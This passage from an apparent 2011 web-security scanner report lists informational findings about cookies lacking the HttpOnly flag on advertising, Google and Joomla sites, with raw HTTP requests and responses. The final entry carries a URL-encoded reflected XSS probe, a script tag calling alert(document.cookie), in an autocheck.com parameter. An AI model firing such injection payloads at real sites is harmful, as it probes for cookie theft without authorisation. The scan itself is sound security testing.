Set-Cookie: bkst=KJhMREMWhzYQyZOARjaGRVjioZrjRZiQS8JA73uqjJ0uooruSsaiqshLqZZjj3bzorEny79O3Jb5GExFm0Idw1IctHyG29WGJ1hQRZOiRZHZRVOARZoCSskrjZhAXj9JJ1lwpx9W+XaLUtTAlqFOxitRxArHCjbX+9DvX4v9fE9l1pYhBnv6+ex0BnRy1exlBM8uqITn9YsAnPA=; expires=Sat, 23-Jul-2011 21:06:44 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkw4=KJpfoXU9y1M90zU9LsXb9T1wLfZFggw1b65ZDFRyIQQM9y1f9f1C9XmeKTPo2fuHNK2Zy3bKkVWmDctEkRFSakNiNn1hUeBiRBMXGAMpaac3tH7I9+V4YpCxhSbwgwfJuNrLbgAjcW6RsvELmqx2eBcBdfw0T0U4o9Hfs9NupXHyt8uO/zgeittavDQ2DeZe/9wW4e4PD3jjcB7tNF42Kb47a5Zc1RaDVaA01OpXWzioSxcueEn4LRWOEvz61pOXhtnwn39IjGjuSySsaE4Uz4aRQDhCTsPQAWNQjWMPNTv3eTYgkyqq9yJOOLhm3tpHl4VgnZ+w0Kx1Khi2Q97AAi5te9yhFpkp9qpZCTX=; expires=Sat, 23-Jul-2011 21:06:44 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Tue, 25-Jan-2011 21:06:44 GMT; path=/; domain=.bluekai.com
BK-Server: d08b
Content-Length: 430
Content-Type: text/html
Connection: keep-alive

<html>
<head>
</head>
<body>
<div id="bk_exchange">
<img src="http://cm.g.doubleclick.net/pixel?nid=bluekai&" width=1 height=1 border=0 alt="">
<img src="http://osmdcs.interclick.com/pixel.aspx?dp=9EB
...[SNIP]...

14.586. http://tags.bluekai.com/site/2981

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/2981

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • bk=QbmOT/N77lGsHNJo; expires=Sat, 23-Jul-2011 21:07:11 GMT; path=/; domain=.bluekai.com
  • bkc=KJh56q2nQAWROde7lg4u4clJzY7iUu3LU9Gzp1EunRvUs3J4ueIQC9Sh4X9DoWa0qTLS7Og5iC3AF0Oy3iV/GvlaYQngpgFlprKsspfz2lFlzaKl9OqXOwTIDiTOQegNFmjLc6QcbYoxFdUTVcBVXp9G8dGOVoL9E0XJbHWqZdD2t6s9EGM9R0ArdEt9p4vKNd696Eh9dkH8VMwnK2TxXbTvlyuT4X1pgQ7kacw0enFHDYbJKD21lZ4K6d0poqh+XF05WS52GIrvQl6PyffVFO1C6o2ilkKe7XIXjZsqqK0SM6Qwi422fFavewF2YpLXH3xwYm2lqr5zxdM0UOkLF7X6sIlZZEBPfBRAxqbwR/2mRu4Et1rS7UlkZGd4lbqd8Ukoapr+tuA3BXUfErEsoHz+fsOEKj9bDXRIgs9dUYMd98GNMVx=; expires=Sat, 23-Jul-2011 21:07:11 GMT; path=/; domain=.bluekai.com
  • bko=KJhE8VPQIwduNoKHRH/q9X1E//rByjLUyZJAAmmeLKT9hqTpZxBjAAYhPc6+/9L9bD6mSx==; expires=Sat, 23-Jul-2011 21:07:11 GMT; path=/; domain=.bluekai.com
  • bkst=KJhMREMWhzYQyZOARjaGRVjioZrjRZiQS8JA73uqjJ0uooruSsaiqshLqZZjj3bzorEny79O3Jb5GExFm0Idw1IctHyG29WGJ1hQRZOiRZHZRVOARZoCSskrjZhAXj9JJ1lwpx9W+XaLUtTAlqFOxitRxArOx+/1pGbrySbrTqfIOPfK8rfh/KP8DjPa8jbbHzWZdNdS9oUhXGe+BEzp1nW6Lgu6Be/6+M9yBeztwkJFfQL9Y79pPy==; expires=Sat, 23-Jul-2011 21:07:11 GMT; path=/; domain=.bluekai.com
  • bkw4=KJpfoXU9y1M90zU9LsXb9T1wLfZFggw1b65ZDFRyIQQM9y1f9f1C9XmeKTPo2fuHNK2Zy3bKkVWmDctEkRFSakNiNn1hUeBiRBMXGAMpaac3tH7I9+V4YpCxhSbwgwfJuNrLbgAjcW6RsvELmqx2eBcBdfw0T0U4o9Hfs9NupXHyt8uO/zgeittavDQ2DeZe/9wW4e4PD3jjcB7tNF42Kb47a5Zc1RaDVaA01OpXWzC8sAU24bebUlPjK6GZj2Mebc0QKZRsn3ebJ4m2zpx+xnSOlmwRy9YZD8Gjsn8Mz5zrLn8uSySsaE4Uz4aRQKhCTsPQAWNQjWMPNTv3eTYgkySfYyuYeJi5P+ZiIyw5UxrRxY88RL49Wwmq1hz9d63VjQ==; expires=Sat, 23-Jul-2011 21:07:11 GMT; path=/; domain=.bluekai.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/2981?id=CAESEEWMOpJK7G_TwnZyrwI-rS4&cver=1& HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://tags.bluekai.com/site/10?ret=html&phint=pageName%3Dunknown&phint=pageRequestID%3D427D360F-AD19-8945-2CEDA65620083A33&phint=affiliateGroupName%3DSearch%20Engine%20Optimization%20Project&phint=affiliateName%3DSEO%20DTS%20-%20Google%20ABTL%2013148&phint=campaign%3D13148&phint=__bk_t%3DBuy%20your%20next%20new%20or%20used%20car%20online%20with%20our%20New%20Car%20Pricing%20Guides%2C%20Car%20Reviews%2C%20Vehicle%20Comparisons%20and%20Used%20Car%20Inventory%20services.%20%7C%20Autobytel.com&phint=__bk_k%3DPricing%2CGuide%2Cbuy%20a%20new%20car%2Cbuy%20a%20used%20auto%2Cnew%20auto%2Cused%20auto%2Cnew%20car%2Cused%20car%2Cnew%20car%20pricing%2Cused%20car%20pricing%2Cdealer%2Clocal%20dealer%2C%20new%20car%20inventory%2C%20used%20car%20inventory&limit=10&r=42794077
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bku=yQG99YBZ/AlFQiDm; bk=Sbr2orXnuT6sHNJo; bkc=KJpMRZOQ0s5CRcM06+SUWzMZ9rJ1BcT1skIx9zawRtPQrOgmyceoMiVznXsn0Q4oCda8KHQRdQAy1C0oBT4pFfmCXAc3R4yxeQRsgPysC+ybOaXeMx2ueImcx5lgeIVF8Gny4y+gIM/pBBiYIBS+3wpBZhcXK3CfY8QCIAcXKeEIMyQWw8/jG7TlApkxwhmRl00n0k2QM1o4i1SwDZmWXp29l4rxYV/IiOd9Mzo7dGgvfta7Cww8rucbq0whFRhHIzIIG4vaoH7CdWHsiw8dryhXZSeXK56/wQ1FHe8PUyrLcLHlfWEkUNPCHmcFPDwkub3MX365DwAKScpjO9udChNidN5Q41cT27sG49z6FZy+Q7X/sgfvSDoyFC6lvod7W/nwYKxfB3e0D8oHI4rZ/dQ95omeay==; bko=KJ0qh1q9XmukguXqQpzFC1U//1zcR26Oi7N71QK0J/ai34oSxOR9PgTnh9==; bkst=KJhMREMWhzYQyZOARjaGRVjioZrjRZiQS8JA73uqjJ0uooruSsaiqshLqZZjj3bzorEny79O3Jb5GExFm0Idw1IctHyG29WGJ1hQRZOiRZHZRVOARZoCSskrjZhAXj9JJ1lwpx9W+XaLUtTAlqFOxitRxArHCjbX+9DvX4v9fE9l1pYhBnv6+ex0BnRy1exlBM8uqITn9YsAnPA=; bkw4=KJpfoXU9y1M90zU9LsXb9T1wLfZFggw1b65ZDFRyIQQM9y1f9f1C9XmeKTPo2fuHNK2Zy3bKkVWmDctEkRFSakNiNn1hUeBiRBMXGAMpaac3tH7I9+V4YpCxhSbwgwfJuNrLbgAjcW6RsvELmqx2eBcBdfw0T0U4o9Hfs9NupXHyt8uO/zgeittavDQ2DeZe/9wW4e4PD3jjcB7tNF42Kb47a5Zc1RaDVaA01OpXWzioSxcueEn4LRWOEvz61pOXhtnwn39IjGjuSySsaE4Uz4aRQDhCTsPQAWNQjWMPNTv3eTYgkyqq9yJOOLhm3tpHl4VgnZ+w0Kx1Khi2Q97AAi5te9yhFpkp9qpZCTX=; bkdc=res

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 21:07:11 GMT
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Set-Cookie: bk=QbmOT/N77lGsHNJo; expires=Sat, 23-Jul-2011 21:07:11 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJh56q2nQAWROde7lg4u4clJzY7iUu3LU9Gzp1EunRvUs3J4ueIQC9Sh4X9DoWa0qTLS7Og5iC3AF0Oy3iV/GvlaYQngpgFlprKsspfz2lFlzaKl9OqXOwTIDiTOQegNFmjLc6QcbYoxFdUTVcBVXp9G8dGOVoL9E0XJbHWqZdD2t6s9EGM9R0ArdEt9p4vKNd696Eh9dkH8VMwnK2TxXbTvlyuT4X1pgQ7kacw0enFHDYbJKD21lZ4K6d0poqh+XF05WS52GIrvQl6PyffVFO1C6o2ilkKe7XIXjZsqqK0SM6Qwi422fFavewF2YpLXH3xwYm2lqr5zxdM0UOkLF7X6sIlZZEBPfBRAxqbwR/2mRu4Et1rS7UlkZGd4lbqd8Ukoapr+tuA3BXUfErEsoHz+fsOEKj9bDXRIgs9dUYMd98GNMVx=; expires=Sat, 23-Jul-2011 21:07:11 GMT; path=/; domain=.bluekai.com
Set-Cookie: bko=KJhE8VPQIwduNoKHRH/q9X1E//rByjLUyZJAAmmeLKT9hqTpZxBjAAYhPc6+/9L9bD6mSx==; expires=Sat, 23-Jul-2011 21:07:11 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkst=KJhMREMWhzYQyZOARjaGRVjioZrjRZiQS8JA73uqjJ0uooruSsaiqshLqZZjj3bzorEny79O3Jb5GExFm0Idw1IctHyG29WGJ1hQRZOiRZHZRVOARZoCSskrjZhAXj9JJ1lwpx9W+XaLUtTAlqFOxitRxArOx+/1pGbrySbrTqfIOPfK8rfh/KP8DjPa8jbbHzWZdNdS9oUhXGe+BEzp1nW6Lgu6Be/6+M9yBeztwkJFfQL9Y79pPy==; expires=Sat, 23-Jul-2011 21:07:11 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkw4=KJpfoXU9y1M90zU9LsXb9T1wLfZFggw1b65ZDFRyIQQM9y1f9f1C9XmeKTPo2fuHNK2Zy3bKkVWmDctEkRFSakNiNn1hUeBiRBMXGAMpaac3tH7I9+V4YpCxhSbwgwfJuNrLbgAjcW6RsvELmqx2eBcBdfw0T0U4o9Hfs9NupXHyt8uO/zgeittavDQ2DeZe/9wW4e4PD3jjcB7tNF42Kb47a5Zc1RaDVaA01OpXWzC8sAU24bebUlPjK6GZj2Mebc0QKZRsn3ebJ4m2zpx+xnSOlmwRy9YZD8Gjsn8Mz5zrLn8uSySsaE4Uz4aRQKhCTsPQAWNQjWMPNTv3eTYgkySfYyuYeJi5P+ZiIyw5UxrRxY88RL49Wwmq1hz9d63VjQ==; expires=Sat, 23-Jul-2011 21:07:11 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Tue, 25-Jan-2011 21:07:11 GMT; path=/; domain=.bluekai.com
BK-Server: 45b2
Content-Length: 62
Content-Type: image/gif
Connection: keep-alive

GIF89a.............!..NETSCAPE2.0.....!..    ....,...........L..;

14.587. http://titletweets.com/cupbuzz

Summary

Severity:   Information
Confidence:   Certain
Host:   http://titletweets.com
Path:   /cupbuzz

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • BIGipServercm_web=2221150380.20480.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cupbuzz HTTP/1.1
Host: titletweets.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Tue, 25 Jan 2011 13:20:50 GMT
Server: Apache/2.2
Location: http://www.titletweets.com/cupbuzz
Content-Length: 242
Connection: close
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: BIGipServercm_web=2221150380.20480.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.titletweets.
...[SNIP]...

14.588. http://top.net.mk/joomla-verzii/44-joomla-16-dojde

Summary

Severity:   Information
Confidence:   Certain
Host:   http://top.net.mk
Path:   /joomla-verzii/44-joomla-16-dojde

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • 089e4fa19af2efc7c60bdb03ea3a2cbe=27129c0bc3f4bbc294183027f453203c; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /joomla-verzii/44-joomla-16-dojde HTTP/1.1
Host: top.net.mk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:02:30 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 089e4fa19af2efc7c60bdb03ea3a2cbe=27129c0bc3f4bbc294183027f453203c; path=/
Last-Modified: Mon, 24 Jan 2011 16:02:31 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 58555

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="mk-mk" lang="mk-mk"
...[SNIP]...

14.589. http://translate.google.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://translate.google.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • PREF=ID=6837c8c340aa3ef0:TM=1295884954:LM=1295884954:S=IxvWEj2Jnkrx4IAL; expires=Wed, 23-Jan-2013 16:02:34 GMT; path=/; domain=.google.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: translate.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:02:34 GMT
Expires: Mon, 24 Jan 2011 16:02:34 GMT
Cache-Control: private, max-age=86400
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: PREF=ID=6837c8c340aa3ef0:TM=1295884954:LM=1295884954:S=IxvWEj2Jnkrx4IAL; expires=Wed, 23-Jan-2013 16:02:34 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: translation
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html><html><head><meta content="text/html; charset=UTF-8" http-equiv="content-type"><meta name=keywords content="translate, translations, translation, translator, machine translation, online
...[SNIP]...

14.590. http://translate.google.com/translate_t

Summary

Severity:   Information
Confidence:   Certain
Host:   http://translate.google.com
Path:   /translate_t

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • PREF=ID=58e54bef485bd12c:TM=1295884957:LM=1295884957:S=BeWfOb0gwP1Q71Gx; expires=Wed, 23-Jan-2013 16:02:37 GMT; path=/; domain=.google.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /translate_t?hl=en&q=ges&um=1&ie=UTF-8&sa=N&tab=wT HTTP/1.1
Host: translate.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:02:37 GMT
Expires: Mon, 24 Jan 2011 16:02:37 GMT
Cache-Control: private, max-age=86400
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: PREF=ID=58e54bef485bd12c:TM=1295884957:LM=1295884957:S=BeWfOb0gwP1Q71Gx; expires=Wed, 23-Jan-2013 16:02:37 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: translation
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html><html><head><meta content="text/html; charset=UTF-8" http-equiv="content-type"><meta name=keywords content="translate, translations, translation, translator, machine translation, online
...[SNIP]...

14.591. http://translate.googleusercontent.com/translate_c

Summary

Severity:   Information
Confidence:   Certain
Host:   http://translate.googleusercontent.com
Path:   /translate_c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • PREF=ID=9c6f01bd6ab51254:TM=1295961657:LM=1295961657:S=NEiSWVoIqCAShc7E; expires=Thu, 24-Jan-2013 13:20:57 GMT; path=/; domain=translate.googleusercontent.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /translate_c HTTP/1.1
Host: translate.googleusercontent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 400 Bad Request
Date: Tue, 25 Jan 2011 13:20:57 GMT
Expires: Tue, 25 Jan 2011 13:20:57 GMT
Cache-Control: private, max-age=86400
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=9c6f01bd6ab51254:TM=1295961657:LM=1295961657:S=NEiSWVoIqCAShc7E; expires=Thu, 24-Jan-2013 13:20:57 GMT; path=/; domain=translate.googleusercontent.com
X-Content-Type-Options: nosniff
Server: translation
Content-Length: 1350
X-XSS-Protection: 1; mode=block
Connection: close


<html><head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<title>400 Bad Request</title>
<style><!--
body {font-family: arial,sans-serif}
div.nav {margin-top: 1ex}
div.nav A {f
...[SNIP]...

14.592. http://trsrvr.com/x/www/delivery/ck.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://trsrvr.com
Path:   /x/www/delivery/ck.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • =%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C; path=/
  • OAID=09f6a3c0ec377f634dbea24d32d9701c; expires=Wed, 25-Jan-2012 13:21:00 GMT; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /x/www/delivery/ck.php HTTP/1.1
Host: trsrvr.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 13:21:00 GMT
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: =%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C; path=/
Set-Cookie: OAID=09f6a3c0ec377f634dbea24d32d9701c; expires=Wed, 25-Jan-2012 13:21:00 GMT; path=/
Location: http://trsrvr.com/x/www/delivery/ck.php?ct=1&
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


14.593. http://tweetmeme.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • tm_identity=1e736a4ffb2b89d8eb9feef196afe056; expires=Mon, 31-Jan-2011 22:20:52 GMT; path=/; domain=.tweetmeme.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: tweetmeme.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 24 Jan 2011 22:20:52 GMT
Content-Type: text/html
Connection: close
Set-Cookie: tm_identity=1e736a4ffb2b89d8eb9feef196afe056; expires=Mon, 31-Jan-2011 22:20:52 GMT; path=/; domain=.tweetmeme.com
X-Ads-Served-In: 0.01006293296814
X-Served-In: 0.074193954467773
X-Served-By: h04
Content-Length: 55778

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
Twe
...[SNIP]...

14.594. http://ugg.tweetmeme.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ugg.tweetmeme.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • tm_identity=829c716c3f5e23f491631347aa8b9682; expires=Tue, 01-Feb-2011 14:02:16 GMT; path=/; domain=.tweetmeme.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: ugg.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 14:02:16 GMT
Content-Type: text/html
Connection: close
Set-Cookie: tm_identity=829c716c3f5e23f491631347aa8b9682; expires=Tue, 01-Feb-2011 14:02:16 GMT; path=/; domain=.tweetmeme.com
X-Ads-Served-In: 0.0046799182891846
X-Served-In: 1.2870261669159
X-Served-By: h03
Content-Length: 40013

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <!-- title -->
   <title
...[SNIP]...

14.595. http://venedet.michnica.net/index.php/joomla/1-joomla-16-je-tu

Summary

Severity:   Information
Confidence:   Certain
Host:   http://venedet.michnica.net
Path:   /index.php/joomla/1-joomla-16-je-tu

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • fa5a1b42d3949309610b52593e36fa6f=1841b8d77a50e80e7a37fed80c5175b4; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /index.php/joomla/1-joomla-16-je-tu HTTP/1.1
Host: venedet.michnica.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:02:41 GMT
Server: Apache
Vary: Host,Accept-Encoding
Set-Cookie: fa5a1b42d3949309610b52593e36fa6f=1841b8d77a50e80e7a37fed80c5175b4; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17676


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="sk-sk" lang="sk-sk" dir=
...[SNIP]...

14.596. http://video.google.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://video.google.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • PREF=ID=80bba0dfa9870dce:TM=1295884962:LM=1295884962:S=KNIAhHHGtNDbKn6t; expires=Wed, 23-Jan-2013 16:02:42 GMT; path=/; domain=.google.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: video.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 24 Jan 2011 16:02:42 GMT
Expires: Mon, 24 Jan 2011 16:02:42 GMT
Cache-Control: private, max-age=0
Set-Cookie: PREF=ID=80bba0dfa9870dce:TM=1295884962:LM=1295884962:S=KNIAhHHGtNDbKn6t; expires=Wed, 23-Jan-2013 16:02:42 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: VSFE_1.0
X-XSS-Protection: 1; mode=block
Connection: close

<!doctype html>
<meta content="text/html; charset=UTF-8" http-equiv=content-type>
<meta content="Search millions of videos from across the web." name=description>
<title>Google Videos</title>
<script>
...[SNIP]...

14.597. http://video.google.com/videosearch

Summary

Severity:   Information
Confidence:   Certain
Host:   http://video.google.com
Path:   /videosearch

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • PREF=ID=894a182096f23f60:TM=1295964142:LM=1295964142:S=7DudISgZilhHzEc6; expires=Thu, 24-Jan-2013 14:02:22 GMT; path=/; domain=.google.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /videosearch HTTP/1.1
Host: video.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Content-Type: text/html; charset=UTF-8
Location: http://video.google.com/
Set-Cookie: PREF=ID=894a182096f23f60:TM=1295964142:LM=1295964142:S=7DudISgZilhHzEc6; expires=Thu, 24-Jan-2013 14:02:22 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Date: Tue, 25 Jan 2011 14:02:22 GMT
Server: VSFE_1.0
Content-Length: 221
X-XSS-Protection: 1; mode=block
Connection: close

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://video.google.com/">here</
...[SNIP]...

14.598. http://webtrends.autocheck.com/dcs1djgf3c87ozzcdiy9h9817_3i3h/dcs.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://webtrends.autocheck.com
Path:   /dcs1djgf3c87ozzcdiy9h9817_3i3h/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • WEBTRENDS_ID=173.193.214.243-1295921924.19297; expires=Fri, 22-Jan-2021 02:18:44 GMT; path=/dcs1djgf3c87ozzcdiy9h9817_3i3h
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcs1djgf3c87ozzcdiy9h9817_3i3h/dcs.gif?&dcsdat=1295921925437&dcssip=www.autocheck.com&dcsuri=/&dcsqry=%3FWT.mc_id=1824%26siteID=182471a71%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6dab831a574&dcsref=http://burp/show/54&WT.co_f=173.193.214.243-1295921924.19297&WT.vtid=173.193.214.243-1295921924.19297&WT.vtvs=1295921925442&WT.vt_f_tlv=0&WT.tz=-6&WT.bh=20&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=AutoCheck%20Vehicle%20History%20Reports%20Homepage%20-%20A%20Part%20of%20Experian.&WT.js=Yes&WT.jv=1.5&WT.ct=unknown&WT.bs=1155x1012&WT.fv=10.1&WT.slv=Unknown&WT.tv=8.6.2&WT.dl=0&WT.ssl=0&WT.es=www.autocheck.com/&WT.si_n=FreeVINCK&WT.si_x=1&WT.vt_f_tlh=0&WT.vt_f_d=1&WT.vt_f_s=1&WT.vt_f_a=1&WT.vt_f=1 HTTP/1.1
Host: webtrends.autocheck.com
Proxy-Connection: keep-alive
Referer: http://www.autocheck.com/?WT.mc_id=1824&siteID=182471a71%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6dab831a574
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC=id=173.193.214.243-1295921924.19297:lv=1295943525442:ss=1295943525442

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 02:18:44 GMT
Server: Apache/2.2.3 (Red Hat)
